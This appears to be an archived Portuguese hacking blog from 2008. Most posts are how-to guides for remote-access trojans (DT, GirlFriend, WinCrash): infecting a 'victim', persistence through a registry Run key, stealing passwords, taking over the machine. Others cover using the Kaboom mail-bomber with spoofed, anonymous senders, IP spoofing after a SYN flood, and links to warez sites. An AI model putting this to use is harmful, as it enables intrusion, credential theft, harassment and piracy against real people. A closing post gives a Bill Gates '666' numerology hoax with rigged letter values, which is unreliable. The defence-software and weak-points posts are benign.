Ejecting And Closing The CD-ROM Drive - Abre/Fecha o
drive de CD rom

Msg Box Manager - Envia diferentes tipos de caixas de texto

Esconnde - Mostra a barra iniciar

FTP Server - Abre um servidor de FTP no servidor(CLIENTE
DE FTP REQUERIDO)

Capture Screen - Captura a tela para um arquivo jpeg e
envia para você

Send To URL - Envia o servidor para uma URL

Turn Monitor On/Off - Liga/Desliga o monitor

Get Passwords - Mostra as senhas do servidor

Spawn Prog - Executa um programa no servidor

Spawn Prog Invis - Executa um programa no servidor
invisivelmente

Reboot - Reseta o servidor

Scanner - Procura por servidores do DT Ping Host - Envia
um ping para saber se o IP está infectado

Host System info - Mostra algumas informações do servidor

Swap mouse buttons - Inverte os botões do mouse

Freeze Mouse - Congela o mouse na tela

Hide desktop icons - Esconde os ícones

Hide clock - Esconde o relógio

Hide the system tray - Esconde a barra

List windows - Lista todas as janelas ativas do servidor

Kill window - Usado com o List windows, fecha uma
janela. Não funciona no IE nem no Explorer

Password server - Coloca uma senha de acesso no servidor

Remove server password - Remove a senha do servidor

Send Password to server - Envia a senha para o servidor
para permitir o acesso

Wallpaper - Muda o papel de parede

Delete file - Apaga um arquivo

Show picture - Mostra uma imagem em tela cheia do
servidor no cliente

Ftp port - Permite mudar a porta do FTP

Online Icq Alert - Envia uma mensagem com o IP do
servido para o UIN especificado

Kill the server - Fecha o servidor

Create Dir - Cria um diretório no servidor

Play sound - Toca um arquivo wav no servidor

Extra Irc Scanner Feature - Para permitir que scripts de
IRC procurem por servidores, o DT deixa a porta 6670
(TCP) aberta

Subnet scanner and a sweeplist scanner - Procura por IPs
infectados

Para usar o servidor de FTP, você precisará de um
cliente FTP como o Cute FTP ou WS_FTP ou outro qualquer

OBS: O cliente do DT 2.0 é compatível com o servidor do
DT 1.0

Girl Friend

2008-06-18T10:17:00.000-07:00

GirlFriend (ou "Namorada") é um programa desenvolvido
pela General Failure da Rússia que lhe permite adquirir
informação sobre aplicações que estão sendo executados
em um PC distante , isso significa que se qualquer
computador conectar a Internet e estiver infetado pelo
GirlFriend , você pode conectar e fazer coisas do tipo :

Pegar o texto no que " o usuário infectado " digitar em
qualquer janela que contém senhas ;
Enviar mensagens de sistema ao PC remoto ;
Executar arquivos ;
Enviar a vítima para uma URL ;
Mudar portas de servidor .
Servidor de GirFiend se senta em computador infetado e
olhares para janelas em qual usuário entra em
contra-senhas. Servidor escreve estas contra-senhas com
outro textfields naquela janela para registro e envia
esta lista em sua demanda.

Infectando

Primeiro você tem que infetar " a vítima ": se você não
tem acesso físico para o PC de vítima - lhe envia
windll.exe. Você pode mencionar novamente isto and/or
prendem isto para qualquer outro arquivo executável que
usa silkrope (você pode assumir isto
www.netninja.com/bo/silkrope.html). Quando a vítima
executa este arquivo, A namorada se escreverá ao
diretório de Janelas e se mencionará novamente para
windll.exe. também escreverá para um fio "
Windll.exe=\windll.exe " para
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
em registro. Servidor de namorada salvará tudo é dados
em HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\General Vítima
de Ones corre Servidora de Namorada - correrá toda vez
quando a vítima cargas o Windows. Se você tem acces
físico ao PC de vítima - só corrida Servidor de namorada
nisto!

Conectando ao Cliente

Para conectar em um servidor da GirlFriend , você
executa o Cliente de GilrFriend (gf.exe) em seu PC.
Então no campo " IP " você deve entrar com o IP do
computador infetado. Em "Port" entre na porta do
Servidor " de GirlFriend (default=21554) e clique no
botão "Connect".
Quando o cliente conecta a servidor no statusbar
aparecerá " Connected : ". Se aparecer uma
mensagem como " Error connecting to "
significa que o servidor não está ativo e pode ser que a
vítima não esteja conectada . Você também pode scannear
uma subnet para o PC infectado escrevendo o IP assim
"200.227.230.70".

Kaboom 3.0

2008-06-18T10:16:00.000-07:00

Pra quem ainda não sabe, o Kaboom é um dos mais
populares programas de mail-bombers utilizados na
Internet. O que ? Você não sabe o que é um mail bomber
?... Então é melhor você parar sua leitura por aqui, e
ir ler uma revistinha... do Mickey, quem sabe ?

Para aqueles que já sabem o que é um mail-bomber, bem,
aqui vão algumas pequenas dicas para o uso deste
"terrível" software :)

O Kaboom tem uma interface um tanto simples, o que,
embora facilite um pouco, justamente por não possuir um
monte de besteiras, acaba confundindo um pouco os mais
novatos.

Ao executarmos o soft, ele abre uma pequena janela com 3
grandes botões, a saber:

Mailbomber Mailing Lists Close

Mailbomber:

Esse botão nos dá acesso a janela "principal" do
programa, cuja visualização perfeita requer uma
configuração de vídeo de no mínimo 800X600. Caso seu
monitor estiver configurado em 640X480, você terá
dificuldades em visualizar corretamente essa janela.

Temos várias opções disponíveis:

TO : Aqui você digita o endereço de mail da vítima, a
qual você enviará o mail-bomber.

FROM : Você coloca aqui, o endereço que você quer que
o programa envie como o responsável pelo envio. Você
pode inventar qualquer endereço idiota, do tipo :
eu@nao.gov, ou hehehe@palhaco.com, ou ainda aquilo que
você preferir...

SERVER : O servidor de mails que você vai utilizar.
Aqui é que vale frisar algo muito importante: Verifique
antes de enviar um bomb mail, se o servidor que você
escolheu está realmente enviando os mails anonimamente,
ou senão meu amigo, he he he, você vai dançar bonitinho.
Uma dica é você enviar um e-mail pra você mesmo, e
verificar o cabeçalho. Claro, cuidado pra não enviar um
bomb mail pra si mesmo, a não ser que você seja louco,
ou muito burro, quem sabe... Na Internet tem de tudo... :)

Priority : Aqui vai a prioridade de envio de seu
mail. Pode deixar em prioridade Normal, a não ser que
você queira presentear a vítima muito rápido...

Subject : O Assunto relativo a seu mail. Algumas
pessoas costumam "filtrar" seus programas de e-mail pelo
campo subject, portanto, seja experto.

Message body : O corpo da sua mensagem. Vale lembrar
que mensagens muito longas demoram mais para serem
enviadas... mas também para serem "descarregadas"..

Number of messages : O número de mails que você quer
enviar. Aqui existe uma caixa de opção, para você enviar
"perpetuamente", ou seja, enquanto você estiver
conectado, o Kaboom irá ficar enviando mails para a
vítima, até que você interrompa, ou, que caia a ligação...

Vale lembrar aqui, que quando você digita uma vez o nome
da vítima, ou seu pseudônimo de envio, o Kaboom arquiva
essas informações, portanto, num próximo envio, esses
dados já estarão a disposição, bastando abrir a caixa de
escolha.

Mailing Lists

Esta opção talvez seja até melhor do que enviar um mail
bomb para uma vítima qualquer. Diferente disso, você
estará colocando o "dito cujo", numa enrascada danada,
pois, receber dezenas, até centenas de mails diferentes,
de listas de discussão das mais idiotas, pode ser muito
pior do que você imagina.

Aqui tem-se inúmeras opções de listas disponíveis. Uma
passada lenta com o cursos do mouse sobre elas, lhe
abrirá uma pequena mensagem informando do que se trata.
Tem um pouco de tudo, sempre no entanto, de assuntos um
tanto "chatos" e irritantes.

Address : Você coloca o mail da vítima. Caso você já
tenha enviado algum mail a essa pessoa, o endereço já
estará disponível.

Name : O nome fictício da inscrição da vítima, ou
seja, este é o nome que ela receberá na lista de
discussão que você a está inscrevendo.

Server : O servidor de mail que você escolher. Aqui
vale lembrar, não tem muita importância se o servidor é
100% confiável em matéria de anonimato, mas, em
compensação, você não poderá testar em si mesmo...
Algumas listas são difíceis de se sair...

Send your condolences : Aqui você, além de inscrever
o pobre coitado nessas listas, ainda envia suas
"condolências"... Vale lembrar aqui o anonimato do server...

Em lists left to subscribe to , o programa mostra
quantas listas ainda restam a inscrever...

Além dessas telas, o programa possui um pequeno menu,
que contem também poucas opções:

Phile : Apenas com a opção para sair do programa

Edit : Aqui você pode criar já uma pequena lista de
vítimas para ficarem já disponíveis quando do uso do
Kaboom. Você também poderá adicionar servers, ou retirar
os indesejáveis, bem como também permitir que o programa
inclua o bem-bolado som de uma descarga, quando do envio
de seus mail-bombs.

Windows: O mesmo que se você apertar um dos botões da
janela.

About: Com duas opções, apenas com as informações
sobre o autor deste soft, um maluco com cara de
terrorista mesmo, que se denomina The Messiah. Aqui o
programa exibe algumas informações sobre sua máquina.

Lembrando que o uso deste programa por pessoas mal
intencionadas pode criar muitas dores de cabeça, tanto
para as possíveis "vítimas", quanto para o malfeitor, se
for um idiota qualquer, que não sabe utilizar
corretamente um servidor de mails anônimo. Portanto, a
responsabilidade é sua.

DNS

2008-06-18T10:15:00.000-07:00

Este texto irá tratar sobre um assunto muito pouco explorado atualmente, o DNS/IP Spoof. Essa técnica consiste em assumir a identidade de um outro computador numa rede, visando estabelecer o controle de uma máquina que confie no DNS/IP de outra máquina sendo possível assim estabelecer ma conexão sem utilização de senha. Resolvi tratar desse tema porque ele é muito pouco explorado atualmente e é realmente difícil encontrar informações sobre ele. Quando precisei usar essa técnica pouco encontrei e muito me fez falta...

Funciona mais ou menos assim: o Servidor 1 tem um acesso confiável no Servidor 2, isto é, não é necessária nenhuma senha para os dois se comunicarem (isso nos serviços rexec, rlogin, rsh). Acho que fica mais fácil com esse esquema:

Acesso Confiável

Servidor 1 --------------------------------- Servidor 2

Portanto, o cracker irá dizer ao Servidor 2 que seu DNS/IP é o do Servidor 1, tornando possível a conexão. O Spoof acontece assim: numa conexão TCP são mandados 3 pacotes. O primeiro diz algo com "Ei Servidor 2! eu quero me conectar com você!", então o Servidor 2 captura esse pacote e manda um número de seqüência e, a esse número é incrementado 128 a cada segundo e 64 após o começo de cada conexão. Agora o cracker vira um cego em tiroteio! Ele precisa descobrir através de suas observações qual número de seqüência o servidor está esperando, por a conexão de pé, e pronto. Ele está com uma conexão forjada!

Os ataques utilizando a técnica de spoof tecnicamente, são assim: digamos que você quer forjar a identidade do Servidor 1. Então, primeiro derrube-o! Nada que um SYN Flood não faça. Agora, com base no item acima, você deve estabelecer uma conexão, forjando a identidade do Servidor 1 com Servidor 2. Hahahah acho que agora eu peguei você! Você deve estar pensando... "e com que diabos eu vou fazer isso???". Então eu sugiro que você use um bom programa de spoof, eu aconselho o spoofit. O problema é que ele vem em código source e não vou escrever tudo isso aqui porque haja paciência!

Vulnerabilidade: spoof é um ataque ao qual não estão sujeitos todos os SOs. Somente aqueles rodando uma versão completa do TCP/IP. Estou me referindo a Unix likes. Ou seja, máquinas rodando Windows ou DOS não são vulneráveis. Mas Mac rodando A/UX e PCs rodando Linux podem estar vulneráveis sob certas circunstância: se estiverem utilizando o X-Windows System, Serviços Remotos (R Services), ou algum tipo de NFS mal configurado

Wincrash 1.03

2008-06-18T10:12:00.000-07:00

O WinCrash é um programa dividido em duas partes, um Cliente e um Servidor... O Cliente é o programa que você irá usar pra se conectar ao Servidor pela internet ou por uma rede interna com protocolo TCP/IP.Para se conectar ao Servidor (server.exe) ele prescisa estar rodando no computador que você deseja se conectar. O Servidor é invisivel, não aparecendo nem no CTRL+ALT+DEL(lista de processos visiveis rodando)... Quando o Servidor é executado, ele se auto-instala no sistema, se executando toda vez que o Windows reiniciar...

Para se conectar ao Servidor basta saber o IP (Internet Protocol). Os serviços funcionam através de pacotes encriptados, usando como chave o IP local e o IP remoto...

A Interface do Cliente é simples e fácil de entender, até pra quem não sabe Inglês, pois as descrições dos serviços estão em Português...

Você pode usar o Cliente para operar o Servidor, tendo muito mais controle do que a própria pessoa que está em frente ao micro remoto(Servidor)... Mas também pode usa-lo só para se divertir com seus amigos.

Os Comandos:

ATENÇÃO.
Para cada comando no Cliente, existe um para desfazer .
EX: Para o Open CD-Rom Drive, existe o Close CD-ROM Drive

Keyboard Lights Bomb

Faz com que as luzes do CAPS_LOCK e SCROLL_LOCK fiquem piscando sem parar de meio em meio segundo.

Lock Mouse

Trava o mouse numa área pequena da tela, fazendo com que o Mouse não consiga sair de lá, até que seja acionado o serviço "Mouse Unlock" no Cliente.

Move Mouse

Lhe dá opções variadas de mover o ponteiro do mouse do Servidor

Monitor OFF

Desliga o Monitor do Servidor

Flip Screen

Inverte a tela do Servidor

Open CD-ROM Drive

Abre a gaveta do CD-ROM do Servidor

Flood Server Printer

Imprime uma página com xingamentos na impressora do Servidor

Atenção. Certifique-se antes se a impressora do Servidor está ligada, pois se não, o Servidor vai ficar travado ate a impressora seja ligada.

System Keys OFF

Desabilitas as sequencias de teclas do sistema, ex: CTRL+ALT+DEL, ALT+TAB e as teclas especiais de alguns teclados (tecla ÿ )

Clipboard Lock

Trava a Área de Transferencia do Servidor com a mensagem "WinCrash"

Screen Saver Bomb

Ativa proteção de tela ( se existir ) do Servidor de 2 em 2 segundos

Hide Taskbar

Some com a barra de tarefas do Servidor

Hide Start Button

Some com o Botão Iniciar do Servidor

Disable Start Button

Desativa o Botão Iniciar do Servidor

Active the Screen Saver

Ativa proteção de tela ( se existir ) do Servidor

Remove Desktop Wallpaper

Remove o papel de parede do Servidor

Change Desktop Wallpaper

Lhe dá a possibilidade de escolher o papel de parede do Servidor

Atenção .
A imagem prescisa estar no diretório Windows do Servidor. Ponha somente o nome da imagem para mudar o papel de parede .
EXEMPLO : ondas.bmp

Modify Remote Date

Modifica a data do Servidor para 1/7/94. A data do lançamento do Real.

Close Server EXE

Fecha o Servidor até que o Windows reinicie

Delete Server EXE

Deleta o aplicativo Servidor WinCrash da vítima

Lock Up the System *

Trava o Computador do Servidor

Close all Programs *

Fecha todos os programas e faz log-out do Windows no micro do Servidor

Exit Windows *

Fecha o Windows do Servidor

Shutdown Windows *

Desliga o Windows

MSG Box [Chat]

Abre uma janela de chat pra você poder conversar com o Servidor. Dentro da janela de chat tem 3 botões

(Flood, Beep, Joke)

Flood - Faz com que o Servidor fique muito lento, exibindo milhares de mensagens continuas na tela do Servidor

Beep - Toca um BEEP no Servidor . O Servidor também pode mandar um BEEP para você .

Joke - Faz com que a cada 2 minutos seja exibida uma mensagem irritante no Servidor

Send Text

Você poder mandar um texto para a janela ativa do Servidor

EXEMPLO. Você manda o texto "WinCrash Rulez" para o Servidor, se o Servidor estiver com por exemplo o "Bloco de Notas" aberto a mensagem "WinCrash Rulez" vai aparecer no texto

Get Server Information

Pega o nome, a empresa, a data da BIOS, o processador e quantidade de memória do Servidor. Se você apertar o Botão "Save Information on TXT" o WinCrash ira gerar um arquivos chamado "Info.txt" no diretório do WinCrash.

View Remote Passwords

Lhe permite ver todas as senhas Dial-Up, navegador, e todas as senhas arquivadas em cache...

Só visualiza aquelas senhas que foram salvas com o comando "Salvar Senha".

Se você apertar o Botão "Save Passwords on TXT" o WinCrash ira gerar um arquivos chamado "Senhas.txt" no diretório do WinCrash contendo as senhas

View Remote Netstat

Lhe permite ver o Estato das portas e da conexão do Servidor . Você podera descobrir se o Servidor está com o NetBus ou o BO Instalado..

View Active Process

Lhe permite ver os processos ativos (programas que estão rodando, até escondidos) do Servidor, como o Servidor WinCrash .

Open Server Hard Disk

Quando é acionado ele abre um FTP Server no Servidor. Isso quer dizer que você poderá se conectar pelo seu Navegador de Internet ou seu programa de FTP preferido no C:\ do Servidor. EXEMPLO: "ftp://IP_DO_SERVIDOR" e pronto, você estara mexendo no Hard Disk do Servidor... Para prevenir futuros problemas feche o servidor quando acabar de mexer, clicando em "Close Server Hard Disk"

Play Wav Files

Para você tocar um som do tipo Wav no Servidor.

EXEMPLO : C:\Windows\Media\tada.wav

Delete and Execute Files

Com esse comando você podera executar e deletar arquivos no Servidor. No comando executar e deletar ja vem alguns programas e arquivos frequentemente encontrados nos computadores. Mas você poderá por um programa específico que queira executar ou deletar

EXEMPLO : Windows\Calc.exe

Atenção, não ponha C:\

Modify Remote Autoexec.bat

Modifica o Autoexec.bat do Servidor, transformando-o em varias linhas irritantes, mas nada grave.

* O Cliente irá se desconectar após esses comandos

=====================================================

Perguntas mais frequentes (FAQ)

P : Como descubro o IP do Servidor?

R : Você pode usar o ICQ. Pegue um crack pra ele na nossa página para mostrar o IP de todas as pessoas na sua lista no info.
Pode também usar o IRC, usando a tag: /dns

P : Como faço para me conectar?

R : Depois de descobrir o IP do Servidor, pegue o IP e ponha no campo "Target IP" do Cliente WinCrash.

P : Como faço para me conectar a mim mesmo?

R : Você prescisa rodar o Servidor(server.exe) na sua máquina. Para se conectar sem usar a Internet use o IP "127.0.0.1"(loopback). Os comandos são exatamente os mesmos.
Obs. Para remover o programa do sistema, use o serviço: Delete Server EXE

P : Como faço para remover o Server.exe ( Servidor )

R : Use o comando Delete Server EXE.

P : O comando "View Remote Passwords" não exibe nenhuma senha, o que eu faço?

R : Tente se conectar de novo. Mas provavelmente a causa do problema seja que o Servidor não tenha salvo suas senhas com o comando "Salvar Senhas".

P : Os comandos "View Remote Passwords", "View Remote Netstat" e "View Active Process" mostram seus items desalinhados, porque?

R : Isso acontece quando a conexão com o servidor é muito rápida (Ex : Você estar conectado com você mesmo ). Provavelmente isso irá se alinhar quando você estiver conectado com alguém da Internet.

Defesas

2008-06-18T10:10:00.001-07:00

A seguir alguns softwares que propõem a defender o PC de ataques de hackers e outras ameaças, se você preferir existem alguns softwares em nossa seção proteção no menu ao lado

NORTON INTERNET SECURITY 2002 2.0
www.symantec.com.br

O mais fácil de usar entre os outros produtos, e é também um dos mais completos. O Norton Internet Security 2000 (NIS) oferece um ajuste básico com três níveis de segurança, que deve suficiente para a maioria das pessoas. Para o usuário avançado, existe a possibilidade de definir uma configuração personalizada. Neste caso, o usuário especifica, para cada porta TCP, que tipo de acesso é permitido.
O NIS também estende algumas funções de segurança já existentes nos browsers, como controle de cookies e objetos ActiveX. Como o Safe e o Guard Dog, ele monitora o fluxo de dados que sai do micro e permite bloquear o envio de informações pessoais. Esse filtro pode ser ajustado em vários níveis, de bloqueio total a fluxo de informações. O NIS vem ainda com o Norton AntiVirus, um antiviral de reconhecida qualidade. Pelo leque de recursos que oferece e pela sua boa qualidade, o NIS é uma solução que deve agradar tanto usuário doméstico como ao pequeno escritório.

ESAFE DESKTOP 2.2
www.aladdin.com.br

Como o NIS, o esafe Desktop , da Aladdin, é um Kit completo para a segurança do PC. Ele reúne firewall, antivírus, filtro de conteúdo e a habilidade de impedir outros tipos de ataque, como aqueles baseados em scripts hostis e cavalos-de-tróia. Uma falha está na configuração inicial, que deixa todas as portas abertas até que usuário a modifique, além de não impedir o acesso a arquivos compartilhados. Um recurso singular é a Sandbox, uma área protegida para rodar programas suspeitos. O fato de o Esafe exigir cuidados na configuração torna-o pouco recomendável para o leigo. Mesmo assim, o programa oferece bons recursos.

BLAKICE DEFENDER 2.1
www.networkice.com/html/blackice_defender.html

Ele reúne recursos de firewall pessoal e detector de intrusos. É nessa segunda função que ele se destaca. Quando percebe que há uma tentativa de ataque, o Defender tenta obter e registrar o máximo de informações possíveis sobre o suposto invasor. O software tem uma certa tendência a emitir alarmes falsos. Isso pode ser evitado configurando-o para só avisar nos casos mais sérios. Embora não elimine a necessidade de um antivírus separado, o Defender é capaz de barrar vários tipos de de worms e cavalos-de-tróia. Também evita o travamento da máquina por técnicas de transbordamento de buffer. O Defender não é tão completo como o NIS ou o Esafe. Mesmo assim, sua capacidade de detecção de invasões é um atrativo a considerar.

ZONE ALARM 2.1
www.zonealarm.com

Ele é um firewall individual que complementa outros softwares de segurança, como o antivírus. O utilitário divide o mundo em duas zonas, Local e Internet. O ajuste básico consiste em escolher um entre três níveis de segurança par cada uma dessas zonas. O Zone Alarm também monitora a execução de programas e oferece ao usuário a possibilidade de limitar sua ações. O Zone Alarm é mais poderoso e flexível que o Esafe e o Guard Dog. Ele empata com o NIS em flexibilidade e perde no conjunto de recursos oferecidos . Sua interface com o usuário é simples, mas foge um pouco aos padrões do Windows.É uma boa opção para quem já tem um antivírus e procura um firewall eficaz, mas sem complicações.

INTERNET GUARD DOG 3.0
www.mcafee.com.br

Ele não é propriamente um firewall, mas desempenha uma série de funções de segurança relacionadas com acesso à Internet. Ele monitora o tráfego de dados que vão do micro para a Internet, mas não em sentido contrário. Em princípio, isso não é um problema, já que são raros os PCs individuais com serviços abertos para acesso externo em portas TCP. No entanto, muitos micros têm arquivos compartilhados via Netbios que podem ser acessados pela rede. E o Guard Dog não bloqueia esse tipo de acesso. O utilitário vem acompanhado do VirusSacn, o consagrado antivírus da NAI/McAfee.

Pontos Fracos

2008-06-18T10:09:00.000-07:00

Existem inúmeras categorias de ataque a serviços Internet, explorando falhas de software, hardware e principalmente burlando esquemas de segurança ineficazes em nossas políticas operacionais. Por exemplo:

Sniffer: Captura informações que trafegam pela rede, como logins e senhas em texto não-criptografado, podendo ser utilizadas futuramente por um invasor.

Spoof: Baseia-se na confiança da negociação entre servidores, que acreditam na veracidade do endereço de origem daquela ordem ou informação, e podem sofrer um ataque por mensagens na qual a origem é "disfarçada" como sendo de alguém de confiança.

Mudanças de rota: Um ataque desta natureza pode fazer com que toda a informação de um dado servidor seja obrigada a passar por um espião antes de seguir seu caminho, ou simplesmente sejam redirecionadas para lugar nenhum, causando a "queda" do serviço.

Trojan Horse: Um programa pode ser inadvertidamente instalado em um servidor, o qual permitiria uma invasão por alguma porta ou "brecha" propositadamente implantada neste programa.

Replay: Alguma ação, comandos ou seqüência de eventos podem ser observados durante um processo de autenticação, e repetidas, posteriormente, por um invasor para obter acesso a estes sistemas.

Vírus: À primeira vista pode parecer um simples problema de usuários domésticos, mas os vírus, se não forem devidamente eliminados e controlados, podem causar, direta e indiretamente, vários problemas em uma rede, desde a impossibilidade de comunicação interna, até a interrupção dos serviços vitais.

Adulteração: A falta de um controle de conteúdo eficiente pode fazer com que uma informação seja adulterada durante sua transmissão, pondo em risco a comunicação entre dois sistemas.

Alguns produtos, tais como servidores ou até mesmo sistemas operacionais completos, vêm configurados "da fábrica" de uma forma muito pouco segura, e é necessário conhecer todos os aspectos da nova ferramenta instalada no seu sistema para que ela seja corretamente utilizada.

Programas como servidores de mail, ftp, web ou configurações do sistema, como permissões de arquivos, aplicativos desnecessários (tal como um lpd em um servidor exclusivo de web) devem ser completamente vistoriados antes da sua instalação, procurando se informar sobre suas capacidades de auditoria e sobre seus recursos de segurança.

Pode-se ainda, caso o sistema em questão seja inseguro e necessário, cogitar produtos que possam implementar esta segurança à parte, e dar a mesma importância a eles, instalando-os simultaneamente, e nunca "deixar para depois", pois se alguém detectar uma falha no seu sistema, ela será explorada imediatamente!

E o mais importante: estas configurações padrões, ou os erros mais comuns durante as instalações, são os primeiros alvos dos hackers e, em pouquíssimo tempo seu sistema poderá ser completamente comprometido por pura falta de atenção.

Warez

2008-06-18T10:05:00.000-07:00

O mundo warez é formado por especialistas em desbloquear programas e invadir sistemas com o objetivo de criar grandes depósitos de softwares para a comunidade de colecionadores compulsivos de bits.

Existe ainda, por trás dessa atividade um apelo filosófico que acredita que um software deve cair em domínio público assim que atinge um grande volume de vendas. Mas, afinal o que é Warez?

É uma definição undergroud para a cópia de um software com copyryght, um software pirata, Os sites deniminados warez geralmente contêm este tipo de software e são acessados para a realização de verdadeiras nogociatas no submundo da rede. Warez é totalmente diferente na pirataria tradicional, apesar de ambos estarem cometendo o mesmo tipo de crime. Os piaratas que garvam CDs com toneladas de softwares comerciais visam o lucro finaceiro. No caso do warez, o que existe e move esta estranha atividade é a compulsão por colecionar e conhecer novos programas. A moeda nas negociações são os próprios softawares-softwares se paga em softwares, fazendo com que a comunidade Warez seja uma sociedade baseada na troca de bits.

O universo warez é dividido em grupos, como uma família. Cada um possui suas tarefas e responsabilidades para que, juntos possam usufruir de alguma coisa melhor.

Alguns Links.

[P A S T]

http://pages.infinit.net/obsidian/index.htm

Dead End FTPZ

http://home.thezone.net/~cgriffit

Warez Ftp

http://www.warezftp.org/

(C)Warez

http://hem2.passagen.se/resto/cwarez
Elite Verified Sitez

http://209.75.36.214/
DaBoY's Warez

http://home.att.net/~xxdaboyxx
Warez Universe

http://www.pbtech.com/~warezuni/
Warez pathfinder

http://www.multimedia-/

FAT3 WAREZ DIRECT

http://www.bright.net/~brandonr

WareZ GameZ DownloadZ

http://www4.torget.se/users/p/Pudeln/warez/warez.htm³

Parceria

2008-06-18T09:06:00.000-07:00

O Tuto-Hacker está aberto a novas parcerias (links ).

Desde o mais novo blog que acabou de ser criado, até os mais antigos e visitados - Basta vc entrar em contato e começaremos a trocar links ou banners.

Qual o critério?

Basta nos enviar um link ou print screen de suas stats e já começamos a divulgar seu site no Tuto-Hacker
Em troca, basta divulgar nosso banner ou link em seu site.

As parcerias são muito importantes, pois além das visitas geradas, ainda existe a melhora da classificação nos mecanismos de busca.

Todos os pedidos de parceria serão aceitos.

mande um e-mail para.

rflhacker@hotmail.com

Perfil de um Hacker

2008-06-14T17:08:00.002-07:00

Este profile reflete os comentários detalhados de uma "pesquisa" feita com mais de uma centena de
correspondentes de USENET.
Hackers usualmente não imitam uns aos outros. Por uma razão qualquer, o modo de agir acaba ficando
idêntico, como se todos fossem geneticamente iguais ou criados num mesmo ambiente.

Aparência Geral

Inteligente. Escrutinador. Intenso. Abstraído. Surpreendentemente para uma profissão que é sedentária, a
maioria dos hackers tende a ser magro; ambos os extremos são mais comuns que em qualquer outro lugar.
Bronzeados são raros.

Forma de vestir

Casual, vagamente pos-hippie; camiseta, jeans, tenis, sandalias ou pes descalcos. Cabelo comprido, barbas
e bigodes são comuns. Alta incidência de camisetas com 'slogans'(tipo "vá ao teatro mas não me chame" , etc).
Uma minoria substancia prefere roupas 'de camping' --- coturnos, jaquetas militares e etcs.
Hackers vestem para conforto, funcionalidade e problemas mínimos de manutenção ao invés de aparência
(alguns levam isso a serio e negligenciam higiene pessoal). Eles tem um índice de tolerância baixo a
jaquetas e outras roupas de "negócios"; é até comum eles largarem um emprego ao invés de se conformar
com uma roupa formal.
Hackers do sexo feminino tendem a nunca usar maquiagem visível. A maioria não usa.

Hábitos de leitura

Usualmente com grandes quantidades de ciência e ficção cientifica.Qualquer coisa como 'American
Scientific', 'Super Interessante', etc.. Hackers normalmente tem uma capacidade de leitura de coisas tão
diferentes que impressiona gente de vários gêneros. Tem porem a tendência a não comentar muito isso.
Muitos hackers gastam lendo o que outros gastam assistindo TP e sempre mantêm estantes e estantes de
livros selecionados em casa.

Outros interesses

Alguns hobbies são bastante partilhados e reconhecidos como tendo a ver com cultura: ficcao cientifica,
musica, medievalismo (na forma ativa praticada por Grupos que se isolam da sociedade e organizações
similares) xadrez, go, gamao, jogos de guerra e jogos intelectuais de todos os tipos. (RPG eram muito
difundidos até virarem cultura popular e explorados pela massa). Radio Amadorismo. Alguns até são
linguistas ou fazem teatro.

Atividade física ou esportes

Muitos não seguem nenhum esporte e são anti-exercicio. Aqueles que fazem, não curtem bancar o
espectador. Esporte seria algo que se faz, não algo que se vê os outros fazerem.
Também evitam esportes de grupo como se fossem a peste, com possível exceção de voleyball. Os
esportes dessa raça são quase sempre que envolvem competição individual e auto-superação, ones
involving concentration, stamina, and micromotor skills: martial arts, bicycling, auto racing, kite flying,
hiking, rock climbing, aviation, target-shooting, sailing, caving, juggling, skiing, skating (ice and roller).
Hackers' delight in techno-toys also tends to draw them towards hobbies with nifty complicated equipment
that they can tinker with.

Educação

Quase todos os hackers acima da adolescência são portadores de diploma ou educados até um nível
equivalente. O hacker que aprendeu sozinho é sempre considerado ( pelo menos para os outros hackers)
como mais motivado, e pode ser mais respeitado que o seu equivalente com o canudo. As áreas incluem
(alem da obvia ciência de computação e engenharia elétrica) física, matemática, lingüística e filosofia.

Coisas que os hackers detestam e evitam

IBM mainframes. Smurfs, Duendes e outras formas de "gracinhas". Burocracias. Gente estúpida. Musica fácil
de ouvir. Televisão. (exceto pelo velho "Star Trek" e os "Simpsons"). Ternos. Desonestidade.
Incompetência. Chateação. COBOL. BASIC. Interfaces não gráficas

Mistério da Microsoft

2008-06-14T17:08:00.001-07:00

Se você utiliza produtos MICROSOFT, deve conhecer estes fatos... Você sabe que o VERDADEIRO nome de Bill Gates é William Henry Gates III?

Hoje em dia o conhecemos como Bill Gates (III) onde "III" significa "terceiro". Então, o que há de aterrorizante neste nome? Se você pegar todas as letras do nome Bill Gates III, e considera o código equivalente em ASCII (American standard code for information interchange) para cada uma, e soma todos ... obtém o número 666, que é o número da BESTA (pra quem não sabe)!!!

B = 66

I = 73

L = 76

G = 71

A = 65

T = 84

E = 69

S = 83

I = 1

I = 1 = 666 O NÚMERO DA BESTA, DO DEMÔNIO ........ Coincidência? Talvez, porém pega WINDOWS 95 e faz o mesmo, você obterá 666 também !!! E o mesmo vale para MS-DOS 6.31. Voce esté seguro de que isto é uma coincidência? Você decide ... MS-DOS 6.21 ** 77+83+45+68+79+83+32+54+46+50+49 = 666 WINDOWS 95 ** 87+73+78+68+79+87+83+57+53+1= 666

Prepare-se porque agora vem o melhor !!!!! Para aqueles que tenham "Excel 95" (não é o Excel do Office 97), façam esta prova:

1. Abra um arquivo novo.

2. Posicione-se na linha 95.

3. Click o botão de número 95, assim a linha inteira ficará selecionada.

4. Pressione TAB, para ir para a segunda coluna.

5. Agora, com o mouse, selecione o menu Ajuda (?) e entre em "Sobre Microsoft Excel ..."

6. Pressione as teclas ctrl-alt-shift e (mantendo-as pressionadas), com o mouse, selecione a opção "Suporte ao produto" na janela de ajuda.

7. APARECERÁ UMA JANELA COM O TÍTULO: THE HALL OF TORTURED SOULS. Isto é realmente aterrorizante, de acordo. É um programa similar ao jogo Doom, e você pode percorrê-lo com os botões de direção (setas). Nas paredes aparecem os nomes, em movimento, das almas torturadas...

8. Agora vá até as escadas e volte em direção à parede que estaria às suas costas ao começar o jogo. A branca e quadriculada.

